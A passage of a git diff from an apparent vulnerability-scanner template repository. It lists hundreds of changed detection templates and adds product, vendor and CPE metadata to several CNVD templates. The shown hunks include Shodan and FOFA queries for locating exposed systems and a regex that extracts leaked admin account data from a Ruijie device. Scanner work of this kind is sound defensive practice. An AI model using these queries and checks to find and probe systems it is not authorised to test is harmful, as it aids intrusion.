.../installer/nagiosxi-installer.yaml | 6 +- .../installer/nodebb-installer.yaml | 6 +- .../installer/nopcommerce-installer.yaml | 3 + .../installer/octoprint-installer.yaml | 6 +- .../installer/ojs-installer.yaml | 6 +- .../installer/onlyoffice-installer.yaml | 6 +- .../installer/openemr-setup-installer.yaml | 6 +- .../installer/openfire-setup.yaml | 6 +- .../installer/openmage-install.yaml | 6 +- .../installer/openshift-installer-panel.yaml | 3 + .../installer/opensis-installer.yaml | 6 +- .../installer/orangehrm-installer.yaml | 6 +- .../installer/orangescrum-install.yaml | 6 +- .../installer/orchard-installer.yaml | 6 +- .../owncloud-installer-exposure.yaml | 6 +- .../installer/oxid-eshop-installer.yaml | 6 +- .../installer/pagekit-installer.yaml | 6 +- .../installer/pandora-fms-installer.yaml | 6 +- .../installer/permissions-installer.yaml | 6 +- .../installer/phpbb-installer.yaml | 6 +- .../installer/phpgedview-installer.yaml | 6 +- .../installer/phpipam-installer.yaml | 6 +- .../installer/phpmyfaq-installer.yaml | 6 +- .../installer/phpwind-installer.yaml | 6 +- .../installer/piwigo-installer.yaml | 6 +- .../installer/pmm-installer.yaml | 6 +- .../installer/poste-io-installer.yaml | 6 +- .../installer/prestashop-installer.yaml | 6 +- .../installer/processwire-installer.yaml | 6 +- .../installer/projectsend-installer.yaml | 6 +- .../installer/qloapps-installer.yaml | 6 +- .../installer/redash-installer.yaml | 6 +- .../installer/sabnzbd-installer.yaml | 6 +- .../installer/server-monitor-installer.yaml | 6 +- .../installer/setup-github-enterprise.yaml | 6 +- .../installer/shopware-installer.yaml | 6 +- .../installer/smf-installer.yaml | 6 +- .../installer/snipe-it-installer.yaml | 6 +- .../installer/spa-cart-installer.yaml | 4 + .../installer/subrion-installer.yaml | 6 +- .../installer/sugarcrm-install.yaml | 6 +- .../installer/suitecrm-installer.yaml | 6 +- .../installer/tasmota-install.yaml | 6 +- .../installer/tastyigniter-installer.yaml | 6 +- .../installer/tautulli-install.yaml | 6 +- .../installer/testrail-install.yaml | 6 +- .../installer/tiny-rss-installer.yaml | 6 +- .../installer/typo3-installer.yaml | 6 +- .../installer/umbraco-installer.yaml | 6 +- .../installer/uvdesk-install.yaml | 6 +- .../installer/vtiger-installer.yaml | 6 +- .../installer/webcalendar-install.yaml | 6 +- .../installer/webtrees-install.yaml | 6 +- .../installer/webuzo-installer.yaml | 6 +- .../installer/wiki-js-installer.yaml | 6 +- .../installer/wowonder-installer.yaml | 6 +- .../installer/yzmcms-installer.yaml | 6 +- .../installer/zencart-installer.yaml | 6 +- .../installer/zenphoto-setup.yaml | 5 +- .../misconfiguration/jaeger-ui-dashboard.yaml | 6 +- http/misconfiguration/jboss-status.yaml | 3 + .../jenkins/jenkins-openuser-register.yaml | 4 + .../jetty-showcontexts-enable.yaml | 6 +- .../jupyter-notebooks-exposed.yaml | 6 +- .../kubernetes/kube-state-metrics.yaml | 4 + .../misconfiguration/label-studio-signup.yaml | 6 +- .../laravel-debug-infoleak.yaml | 3 + .../libvirt-exporter-metrics.yaml | 6 +- .../misconfiguration/liferay/liferay-api.yaml | 4 + .../liferay/liferay-axis.yaml | 4 + .../liferay/liferay-jsonws.yaml | 6 +- http/misconfiguration/locust-exposure.yaml | 6 +- .../manage-engine-ad-search.yaml | 4 + .../microsoft/ms-exchange-local-domain.yaml | 5 +- http/misconfiguration/mongod-exposure.yaml | 6 +- .../ms-exchange-user-enum.yaml | 6 +- .../multilaser-pro-setup.yaml | 4 + http/misconfiguration/mysql-history.yaml | 4 + .../nacos-authentication-bypass.yaml | 4 + .../nacos/nacos-create-user.yaml | 6 +- http/misconfiguration/ntop-panel-exposed.yaml | 4 + .../ntopng-traffic-dashboard.yaml | 3 + .../odoo-unprotected-database.yaml | 4 + http/misconfiguration/openstack-config.yaml | 4 + .../oracle-reports-services.yaml | 4 + http/misconfiguration/pcdn-cache-node.yaml | 6 +- http/misconfiguration/perfsonar-toolkit.yaml | 6 +- .../pghero-dashboard-exposure.yaml | 3 + http/misconfiguration/php-errors.yaml | 4 + http/misconfiguration/phpcli-stack-trace.yaml | 4 + .../phpmyadmin/phpmyadmin-setup.yaml | 5 +- http/misconfiguration/puppetdb-dashboard.yaml | 3 + http/misconfiguration/python-metrics.yaml | 4 + .../rabbitmq-exporter-metrics.yaml | 6 +- http/misconfiguration/ray-dashboard.yaml | 6 +- .../request-baskets-exposure.yaml | 6 +- http/misconfiguration/selenium-exposure.yaml | 6 +- .../sentinel-license-monitor.yaml | 6 +- .../servicenow-widget-misconfig.yaml | 4 + http/misconfiguration/sftpgo-admin-setup.yaml | 6 +- .../misconfiguration/slurm-hpc-dashboard.yaml | 3 + http/misconfiguration/smarterstats-setup.yaml | 6 +- http/misconfiguration/smokeping-grapher.yaml | 6 +- .../solr-query-dashboard.yaml | 4 + .../sonarqube-projects-disclosure.yaml | 4 + .../springboot/springboot-auditevents.yaml | 3 + .../sql-server-report-viewer.yaml | 6 +- .../misconfiguration/struts-ognl-console.yaml | 4 + http/misconfiguration/symfony-debug.yaml | 6 +- http/misconfiguration/symfony-fragment.yaml | 4 + .../misconfiguration/syncthing-dashboard.yaml | 6 +- .../tasmota-config-webui.yaml | 6 +- .../teamcity-guest-login-enabled.yaml | 3 + .../teamcity-registration-enabled.yaml | 3 + .../teslamate-unauth-access.yaml | 4 + http/misconfiguration/thinkphp-errors.yaml | 6 +- http/misconfiguration/tomcat-stacktraces.yaml | 6 +- .../transmission-dashboard.yaml | 3 + http/misconfiguration/typo3-composer.yaml | 4 + http/misconfiguration/typo3-debug-mode.yaml | 6 +- .../unauth-apache-kafka-ui.yaml | 4 + .../unauth-celery-flower.yaml | 6 +- http/misconfiguration/unauth-etherpad.yaml | 4 + .../unauth-ldap-account-manager.yaml | 6 +- http/misconfiguration/unauth-mercurial.yaml | 6 +- .../unauth-temporal-web-ui.yaml | 5 +- .../unauthenticated-alert-manager.yaml | 4 + .../unauthenticated-mongo-express.yaml | 4 + .../unauthorized-h3csecparh-login.yaml | 4 + .../untangle-admin-setup.yaml | 6 +- http/misconfiguration/zabbix-error.yaml | 3 + http/technologies/4D-detect.yaml | 6 +- http/technologies/activecollab-detect.yaml | 4 + .../adobe/adobe-coldfusion-detect.yaml | 4 + .../adobe/adobe-coldfusion-error-detect.yaml | 4 + http/technologies/aem-detect.yaml | 4 + http/technologies/aerocms-detect.yaml | 4 + http/technologies/angular-detect.yaml | 4 + http/technologies/apache/airflow-detect.yaml | 6 +- .../apache/apache-answer-detect.yaml | 6 +- .../apache/apache-axis-detect.yaml | 4 + .../apache/apache-cloudstack-detect.yaml | 9 +- .../apache/apache-cocoon-detect.yaml | 4 + .../apache/apache-dubbo-detect.yaml | 4 + .../apache/apache-karaf-panel.yaml | 4 + .../apache/apache-ofbiz-detect.yaml | 72 ++++++++-------- .../apache/apache-streampipes-detect.yaml | 82 ++++++++++--------- .../apache/apache-tapestry-detect.yaml | 4 + .../apache/apache-zeppelin-detect.yaml | 4 + .../apache/default-apache-test-all.yaml | 4 + .../apache/default-apache-test-page.yaml | 4 + .../apache/default-apache2-page.yaml | 4 + .../technologies/apache/ranger-detection.yaml | 4 + .../apache/xampp-default-page.yaml | 4 + http/technologies/appcms-detect.yaml | 4 + http/technologies/autobahn-python-detect.yaml | 4 + http/technologies/avideo-detect.yaml | 4 + http/technologies/b2b-builder-detect.yaml | 4 + http/technologies/bamboo-detect.yaml | 5 +- http/technologies/bigbluebutton-detect.yaml | 4 + http/technologies/bigip-apm-detect.yaml | 6 +- http/technologies/boa-web-server.yaml | 5 +- .../burp-collaborator-detect.yaml | 3 + http/technologies/casaos-detection.yaml | 4 + .../checkpoint-mobile-detect.yaml | 4 + http/technologies/chevereto-detect.yaml | 4 + http/technologies/citrix-hypervisor-page.yaml | 4 + .../citrix-xenmobile-version.yaml | 6 +- .../connectwise-control-detect.yaml | 4 + http/technologies/couchbase-sync-gateway.yaml | 4 + http/technologies/craftercms-detect.yaml | 46 ++++++----- http/technologies/cvsweb-detect.yaml | 4 + http/technologies/dash-panel-detect.yaml | 4 + http/technologies/dedecms-detect.yaml | 4 + http/technologies/default-apache-shiro.yaml | 4 + http/technologies/default-cakephp-page.yaml | 4 + .../default-codeigniter-page.yaml | 4 + http/technologies/default-django-page.yaml | 4 + http/technologies/default-fastcgi-page.yaml | 4 + http/technologies/default-fedora-page.yaml | 4 + .../default-glassfish-server-page.yaml | 6 +- http/technologies/default-jetty-page.yaml | 4 + http/technologies/default-lighttpd-page.yaml | 4 + .../default-lighttpd-placeholder-page.yaml | 4 + http/technologies/default-movable-page.yaml | 4 + http/technologies/default-openresty.yaml | 4 + .../technologies/default-parallels-plesk.yaml | 4 + .../default-payara-server-page.yaml | 4 + http/technologies/default-plesk-page.yaml | 4 + .../default-redhat-test-page.yaml | 4 + http/technologies/default-sitecore-page.yaml | 4 + .../default-ssltls-test-page.yaml | 4 + http/technologies/default-symfony-page.yaml | 4 + http/technologies/default-tengine-page.yaml | 4 + .../default-websphere-liberty.yaml | 4 + http/technologies/devexpress-detect.yaml | 6 +- http/technologies/directus-detect.yaml | 6 +- http/technologies/drupal-detect.yaml | 4 + .../elasticsearch-sql-client-detect.yaml | 4 + http/technologies/element-web-detect.yaml | 6 +- http/technologies/empirecms-detect.yaml | 4 + http/technologies/gitbook-detect.yaml | 4 + http/technologies/glpi-status-page.yaml | 4 + http/technologies/goliath-detect.yaml | 4 + .../google/chromecast-detect.yaml | 6 +- .../graylog/graylog-api-exposure.yaml | 6 +- http/technologies/hugo-detect.yaml | 4 + http/technologies/ibm/ibm-http-server.yaml | 4 + http/technologies/ibm/ibm-odm-detect.yaml | 6 +- .../icecast-mediaserver-detect.yaml | 3 + http/technologies/icecast-server-detect.yaml | 4 + .../identity-server-v3-detect.yaml | 6 +- http/technologies/imgproxy-detect.yaml | 6 +- .../technologies/influxdb-version-detect.yaml | 3 + http/technologies/interactsh-server.yaml | 4 + http/technologies/ispyconnect-detect.yaml | 4 + http/technologies/jeecg-boot-detect.yaml | 4 + http/technologies/jellyfin-detect.yaml | 4 + http/technologies/jhipster-detect.yaml | 4 + http/technologies/jitsi-meet-detect.yaml | 4 + http/technologies/joomla-detect.yaml | 4 + http/technologies/kodexplorer-detect.yaml | 4 + http/technologies/landesk/landesk-ma.yaml | 4 + http/technologies/limesurvey-detect.yaml | 4 + http/technologies/livehelperchat-detect.yaml | 4 + http/technologies/magento-detect.yaml | 4 + http/technologies/magento-eol.yaml | 3 + http/technologies/magento-version-detect.yaml | 3 + http/technologies/magmi-detect.yaml | 4 + .../matrix-homeserver-detect.yaml | 6 +- http/technologies/microsoft-iis-8.yaml | 4 + .../microsoft/default-iis7-page.yaml | 4 + .../default-microsoft-azure-page.yaml | 4 + .../default-windows-server-page.yaml | 4 + http/technologies/mikrotik-httpproxy.yaml | 4 + http/technologies/mongoose-server.yaml | 4 + http/technologies/moveit-transfer-detect.yaml | 4 + http/technologies/nacos-version.yaml | 5 +- http/technologies/nextcloud-detect.yaml | 4 + .../nextcloud-owncloud-detect.yaml | 6 +- http/technologies/nexus-detect.yaml | 4 + http/technologies/notion-detect.yaml | 4 + http/technologies/ntop-detect.yaml | 3 + http/technologies/open-journal-systems.yaml | 4 + http/technologies/openhap-detect.yaml | 4 + http/technologies/openproject-detect.yaml | 4 + http/technologies/openssl-detect.yaml | 4 + http/technologies/oracle/oracle-dbcs.yaml | 4 + .../oracle/oracle-iplanet-web-server.yaml | 4 + .../oracle/oracle-webcenter-sites.yaml | 4 + http/technologies/osquery-fleet-detect.yaml | 3 + .../payara-micro-server-detect.yaml | 4 + http/technologies/pbootcms-detect.yaml | 4 + http/technologies/pexip-detect.yaml | 34 ++++---- http/technologies/php-detect.yaml | 4 + http/technologies/php-fusion-detect.yaml | 4 + http/technologies/phplist-detect.yaml | 4 + http/technologies/pi-hole-detect.yaml | 4 + http/technologies/prestashop-detect.yaml | 4 + http/technologies/privatebin-detect.yaml | 50 +++++------ http/technologies/projectsend-detect.yaml | 3 + http/technologies/pypiserver-detect.yaml | 4 + .../roundcube-webmail-portal.yaml | 4 + http/technologies/rseenet-detect.yaml | 4 + http/technologies/rsshub-detect.yaml | 4 + http/technologies/samsung-smarttv-debug.yaml | 4 + .../sharefile-storage-server.yaml | 4 + http/technologies/shopware-detect.yaml | 4 + http/technologies/simplesamlphp-detect.yaml | 6 +- http/technologies/sitecore-cms.yaml | 4 + http/technologies/smartstore-detect.yaml | 4 + http/technologies/snipeit-panel.yaml | 3 + http/technologies/sogo-detect.yaml | 4 + http/technologies/statamic-detect.yaml | 6 +- http/technologies/subrion-cms-detect.yaml | 4 + http/technologies/thinkphp-detect.yaml | 3 + .../tibco-businessconnect-detect.yaml | 6 +- .../tibco-spotfire-services-detect.yaml | 6 +- http/technologies/tileserver-gl.yaml | 3 + http/technologies/tinyproxy-detect.yaml | 6 +- http/technologies/typo3-detect.yaml | 4 + http/technologies/utility-service-detect.yaml | 4 + http/technologies/vbulletin-detect.yaml | 4 + .../versa/versa-analytics-server.yaml | 4 + .../versa/versa-director-api.yaml | 4 + .../versa/versa-networks-detect.yaml | 4 + .../vivotex-web-console-detect.yaml | 4 + .../vmware/vmware-horizon-version.yaml | 4 + .../technologies/wing-ftp-service-detect.yaml | 6 +- http/technologies/wms-server-detect.yaml | 4 + .../themes/wp-bricks-builder-theme.yaml | 48 ++++++----- http/technologies/xenforo-detect.yaml | 4 + .../technologies/xerox-workcentre-detect.yaml | 4 + http/technologies/yapi-detect.yaml | 4 + http/technologies/yeswiki-detect.yaml | 3 + http/technologies/yourls-detect.yaml | 6 +- http/technologies/zend-server-test-page.yaml | 4 + .../74cms/74cms-weixin-sqli.yaml | 4 + .../apache/apache-nifi-rce.yaml | 6 +- .../apache/apache-ofbiz-log4j-rce.yaml | 3 + .../apache/apache-solr-log4j-rce.yaml | 5 +- .../vulnerabilities/avaya/avaya-aura-xss.yaml | 3 + .../cisco-unified-communications-log4j.yaml | 3 + .../cisco/cisco-webex-log4j-rce.yaml | 3 + .../citrix/citrix-oob-memory-read.yaml | 6 +- .../dedecms-carbuyaction-fileinclude.yaml | 4 + .../dedecms/dedecms-config-xss.yaml | 3 + .../dedecms/dedecms-membergroup-sqli.yaml | 3 + .../dedecms/dedecms-openredirect.yaml | 3 + http/vulnerabilities/dedecms/dedecms-rce.yaml | 4 + .../discuz/discuz-api-pathinfo.yaml | 4 + .../ecstatic/node-ecstatic-listing.yaml | 6 +- .../esafenet-netsecconfigajax-sqli.yaml | 5 +- http/vulnerabilities/froxlor-xss.yaml | 3 + http/vulnerabilities/gitea/gitea-rce.yaml | 4 + http/vulnerabilities/gitlab/gitlab-rce.yaml | 3 + .../gnuboard/gnuboard-sms-xss.yaml | 3 + .../gnuboard/gnuboard5-rxss.yaml | 3 + .../gnuboard/gnuboard5-xss.yaml | 3 + http/vulnerabilities/gradio/gradio-lfi.yaml | 5 +- http/vulnerabilities/gradio/gradio-ssrf.yaml | 5 +- .../grafana/grafana-file-read.yaml | 3 + .../huawei/huawei-hg255s-lfi.yaml | 3 + .../j2ee/liferay-resource-leak.yaml | 3 + .../jamf/jamf-log4j-jndi-rce.yaml | 3 + .../jira/jira-servicedesk-signup.yaml | 3 + .../jira-unauthenticated-adminprojects.yaml | 4 + .../jira/jira-unauthenticated-dashboards.yaml | 4 + .../jira/jira-unauthenticated-screens.yaml | 4 + .../jira-unauthenticated-user-picker.yaml | 4 + http/vulnerabilities/juniper/junos-xss.yaml | 6 +- .../vulnerabilities/jupyter-notebook-rce.yaml | 4 + .../landray/landray-eis-sqli.yaml | 6 +- .../landray/landray-oa-replaceextend-rce.yaml | 6 +- ...andray-oa-sysSearchMain-editParam-rce.yaml | 4 + .../landray/landray-oa-treexml-rce.yaml | 4 + .../magento/magento-2-exposed-api.yaml | 4 + .../magento/magento-cacheleak.yaml | 4 + .../magento-unprotected-dev-files.yaml | 4 + .../microsoft/office-webapps-ssrf.yaml | 6 +- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 3 + .../nuxt/nuxt-js-semi-lfi.yaml | 6 +- .../other/3cx-management-console.yaml | 3 + .../vulnerabilities/other/acti-video-lfi.yaml | 4 + .../other/apache-druid-log4j.yaml | 5 +- http/vulnerabilities/other/bagisto-csti.yaml | 6 +- .../other/beyond-trust-xss.yaml | 4 + http/vulnerabilities/other/carrental-xss.yaml | 3 + .../other/citrix-xenapp-log4j-rce.yaml | 3 + .../other/ckan-dom-based-xss.yaml | 3 + .../other/cmseasy-crossall-act-sqli.yaml | 4 + .../other/coldfusion-debug-xss.yaml | 3 + .../other/dixell-xweb500-filewrite.yaml | 6 +- .../other/doorgets-info-disclosure.yaml | 6 +- http/vulnerabilities/other/dzzoffice-xss.yaml | 3 + .../other/ecology-oa-file-sqli.yaml | 4 + http/vulnerabilities/other/ecshop-sqli.yaml | 5 +- .../other/elFinder-path-traversal.yaml | 3 + .../other/elasticsearch5-log4j-rce.yaml | 3 + http/vulnerabilities/other/fastadmin-lfi.yaml | 6 +- http/vulnerabilities/other/flatpress-xss.yaml | 5 +- .../other/flexnet-log4j-rce.yaml | 3 + http/vulnerabilities/other/flir-ax8-rce.yaml | 4 + .../other/fortiportal-log4j-rce.yaml | 3 + http/vulnerabilities/other/graylog-log4j.yaml | 3 + .../other/hospital-management-xss.yaml | 3 + .../other/hospital-management-xss2.yaml | 3 + .../other/icewarp-open-redirect.yaml | 3 + .../other/icewarp-webclient-rce.yaml | 3 + .../other/inspur-clusterengine-rce.yaml | 3 + http/vulnerabilities/other/kavita-lfi.yaml | 3 + .../other/kingsoft-vgm-lfi.yaml | 4 + .../other/kiwitcms-json-rpc.yaml | 6 +- .../other/landray-oa-datajson-rce.yaml | 4 + .../other/logstash-log4j-rce.yaml | 3 + .../other/manage-engine-dc-log4j-rce.yaml | 3 + .../other/nacos-auth-bypass.yaml | 4 + http/vulnerabilities/other/ncast-lfi.yaml | 6 +- .../other/nextjs-redirect.yaml | 5 +- .../other/ns-asg-file-read.yaml | 3 + .../other/opencart-core-sqli.yaml | 6 +- http/vulnerabilities/other/opencti-lfi.yaml | 3 + .../other/opennms-log4j-jndi-rce.yaml | 3 + .../other/openshift-log4j-rce.yaml | 3 + http/vulnerabilities/other/opensis-lfi.yaml | 3 + .../other/papercut-log4j-rce.yaml | 3 + .../other/parallels-hsphere-xss.yaml | 3 + .../vulnerabilities/other/pega-log4j-rce.yaml | 3 + .../other/phpldapadmin-xss.yaml | 6 +- http/vulnerabilities/other/phpok-sqli.yaml | 3 + .../vulnerabilities/other/quick-cms-sqli.yaml | 6 +- .../other/rconfig-file-upload.yaml | 3 + http/vulnerabilities/other/rundeck-log4j.yaml | 3 + .../other/seeyon-oa-log4j.yaml | 3 + .../other/sharp-printers-lfi.yaml | 6 +- .../other/siteminder-dom-xss.yaml | 3 + http/vulnerabilities/other/slims-xss.yaml | 4 + .../other/sofneta-mecdream-pacs-lfi.yaml | 3 + .../other/solarview-compact-xss.yaml | 3 + .../other/sonicwall-nsm-log4j-rce.yaml | 3 + .../other/splunk-enterprise-log4j-rce.yaml | 3 + http/vulnerabilities/other/steve-xss.yaml | 3 + .../other/symantec-sepm-log4j-rce.yaml | 3 + http/vulnerabilities/other/tamronos-rce.yaml | 3 + .../other/tekon-info-leak.yaml | 4 + .../other/tendat-credential.yaml | 6 +- http/vulnerabilities/other/thruk-xss.yaml | 3 + .../other/unifi-network-log4j-rce.yaml | 3 + .../other/ups-network-lfi.yaml | 6 +- http/vulnerabilities/other/voyager-lfi.yaml | 5 +- .../other/wapples-firewall-lfi.yaml | 3 + .../other/webpagetest-ssrf.yaml | 6 +- http/vulnerabilities/other/wuzhicms-sqli.yaml | 3 + .../other/xenmobile-server-log4j.yaml | 3 + .../other/xxljob-executor-unauth.yaml | 4 + http/vulnerabilities/other/yeswiki-sql.yaml | 3 + .../other/yeswiki-stored-xss.yaml | 3 + http/vulnerabilities/other/yeswiki-xss.yaml | 3 + http/vulnerabilities/phpmyadmin-unauth.yaml | 4 + .../ruijie/ruijie-nmc-sync-rce.yaml | 6 +- .../ruijie/ruijie-password-leak.yaml | 4 + .../sangfor/sangfor-ngaf-lfi.yaml | 4 + .../sitecore/sitecore-xml-xss.yaml | 4 + .../springboot/springboot-h2-db-rce.yaml | 3 + .../thinkphp6-arbitrary-write.yaml | 4 + .../tongda/tongda-action-uploadfile.yaml | 6 +- .../tongda/tongda-auth-bypass.yaml | 6 +- .../tongda/tongda-getdata-rce.yaml | 4 + .../tongda/tongda-insert-sqli.yaml | 4 + .../tongda/tongda-meeting-unauth.yaml | 4 + .../tongda/tongda-report-func-sqli.yaml | 4 + .../tongda/tongda-video-file-read.yaml | 4 + .../tongda/tongdaoa-auth-bypass.yaml | 6 +- .../vulnerabilities/ueditor/ueditor-ssrf.yaml | 4 + .../vbulletin/vbulletin-ajaxreg-sqli.yaml | 5 +- .../vbulletin/vbulletin-search-sqli.yaml | 6 +- http/vulnerabilities/videoxpert-lfi.yaml | 3 + .../vmware/vmware-cloud-xss.yaml | 6 +- .../vmware-operation-manager-log4j.yaml | 3 + .../vmware/vmware-vcenter-log4j-jndi-rce.yaml | 3 + .../vmware/vrealize-operations-log4j-rce.yaml | 3 + .../ecology-jqueryfiletree-traversal.yaml | 4 + .../ecology-verifyquicklogin-auth-bypass.yaml | 4 + .../ecology/ecology-syncuserinfo-sqli.yaml | 3 + .../eoffice/weaver-eoffice-file-upload.yaml | 4 + .../weaver/weaver-checkserver-sqli.yaml | 4 + .../weaver/weaver-ecology-bshservlet-rce.yaml | 7 +- .../weaver-ecology-getsqldata-sqli.yaml | 4 + .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 4 + .../weaver/weaver-group-xml-sqli.yaml | 6 +- .../weaver/weaver-jquery-file-upload.yaml | 6 +- .../weaver-ktreeuploadaction-file-upload.yaml | 4 + .../weaver/weaver-mysql-config-info-leak.yaml | 4 + .../weaver-office-server-file-upload.yaml | 6 +- .../weaver/weaver-officeserver-lfi.yaml | 4 + .../weaver/weaver-signaturedownload-lfi.yaml | 4 + .../weaver-sptmforportalthumbnail-lfi.yaml | 4 + .../weaver/weaver-uploadify-file-upload.yaml | 6 +- .../weaver-uploadoperation-file-upload.yaml | 4 + .../weaver/weaver-userselect-unauth.yaml | 4 + .../wechat/wechat-info-leak.yaml | 4 + .../wordpress/analytify-plugin-xss.yaml | 3 + .../wordpress/booked-export-csv.yaml | 4 + .../wordpress/photo-gallery-xss.yaml | 6 +- .../photoblocks-grid-gallery-xss.yaml | 4 + .../wordpress/shortcode-lfi.yaml | 3 + .../wordpress/wordpress-ssrf-oembed.yaml | 6 +- .../wordpress/wp-gallery-file-upload.yaml | 4 + .../wordpress/wp-mstore-plugin-listing.yaml | 4 + .../wordpress/wp-real-estate-xss.yaml | 3 + .../wordpress/wp-social-warfare-rce.yaml | 4 + .../wordpress/wp-statistics-sqli.yaml | 6 +- .../wp-superstorefinder-misconfig.yaml | 4 + http/vulnerabilities/wordpress/wp-sym404.yaml | 4 + .../wordpress/wp-touch-redirect.yaml | 4 + .../wordpress/wp-yoast-user-enumeration.yaml | 6 +- .../yonyou/yonyou-nc-accept-fileupload.yaml | 4 + .../yonyou-nc-baseapp-deserialization.yaml | 4 + .../yonyou-nc-dispatcher-fileupload.yaml | 4 + .../yonyou-nc-grouptemplet-fileupload.yaml | 4 + .../yonyou/yonyou-nc-info-leak.yaml | 4 + .../yonyou-nc-ncmessageservlet-rce.yaml | 4 + .../yonyou/yonyou-ufida-nc-lfi.yaml | 6 +- http/vulnerabilities/zend/zend-v1-xss.yaml | 4 + .../zyxel/unauth-ztp-ping.yaml | 4 + .../zzzcms/zzzcms-info-disclosure.yaml | 4 + http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml | 6 +- http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 6 +- 1077 files changed, 5109 insertions(+), 1200 deletions(-) diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index 2d798f9bed..f9328bd413 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -12,8 +12,12 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1298131932 fofa-query: jshERP-boot + product: jsherp + vendor: jishenghua tags: cnvd,cnvd2020,jsherp,disclosure + classification: + cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001094e317be5b989e3d7461dd099453f1237356ce28affa5ee58239edd6affa502205957345e5569e5b78bc928736bd415c0445ca550661c57cd1e27f9d66d6520a3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-14536.yaml b/http/cnvd/2021/CNVD-2021-14536.yaml index 5280bf0e1d..16cc5d8144 100644 --- a/http/cnvd/2021/CNVD-2021-14536.yaml +++ b/http/cnvd/2021/CNVD-2021-14536.yaml @@ -11,9 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + cpe: cpe:2.3:h:ruijie:rg-uac:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: title="RG-UAC登录页面" + product: rg-uac + vendor: ruijie tags: cnvd2021,cnvd,ruijie,disclosure http: @@ -42,4 +45,4 @@ http: group: 1 regex: - '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":' -# digest: 490a00463044022046fa27ed559165bee99e3f0591f1ca5ee488637fb236c6b1c81fe49ee2c93865022045c885a0df3ac7a1fbada587a1785a09b40212dc68eeb662117a4e7bccac59d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046fa27ed559165bee99e3f0591f1ca5ee488637fb236c6b1c81fe49ee2c93865022045c885a0df3ac7a1fbada587a1785a09b40212dc68eeb662117a4e7bccac59d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-15822.yaml b/http/cnvd/2021/CNVD-2021-15822.yaml index 6764236173..b9a7a87088 100644 --- a/http/cnvd/2021/CNVD-2021-15822.yaml +++ b/http/cnvd/2021/CNVD-2021-15822.yaml @@ -13,8 +13,12 @@ info: max-request: 1 shodan-query: title:"ShopXO企业级B2C电商系统提供商" fofa-query: app="ShopXO企业级B2C电商系统提供商" + product: shopxo + vendor: shopxo tags: cnvd2021,cnvd,shopxo,lfi + classification: + cpe: cpe:2.3:a:shopxo:shopxo:*:*:*:*:*:*:*:* http: - raw: - | @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206735e750a62b437583ca1e1cae33666b4c2ce3b8a8310c3d1212a98fcb018a69022066c8a339f06f76b3df20a5c624b054d356f219e1e77661921c541dc2d7ee4dc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index 349f5de0be..53bf94626a 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -12,9 +12,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 + cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:* metadata: max-request: 2 fofa-query: app="Landray OA system" + product: landray_office_automation + vendor: landray tags: cnvd,cnvd2021,landray,lfi http: @@ -47,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b98b4479ab9f48943be02a1d2b3a0cebe9d3d5389705d58d3d7ca1f306dcdebc022100d07fed00db3b41b001193fcbaf37522bdd576917c02364b840beb62c96d46a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b98b4479ab9f48943be02a1d2b3a0cebe9d3d5389705d58d3d7ca1f306dcdebc022100d07fed00db3b41b001193fcbaf37522bdd576917c02364b840beb62c96d46a32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml index ba26c29af4..0c44b0cdd8 100755 --- a/http/cnvd/2021/CNVD-2021-33202.yaml +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -13,7 +13,11 @@ info: verified: true max-request: 1 fofa-query: app="泛微-协同办公OA" + product: e-cology + vendor: weaver tags: cnvd2021,cnvd,e-cology,sqli + classification: + cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:* variables: num: "999999999" @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c3b8ac764f980a41094f1c98193a9080c65ceaff64975f42b69ef53477bb196022100bb0b3e66abdc94f608aefecaf03255af930789468009df696c1eedb8dff2d283:922c64590222798bb761d5b6d8e72950 diff --git 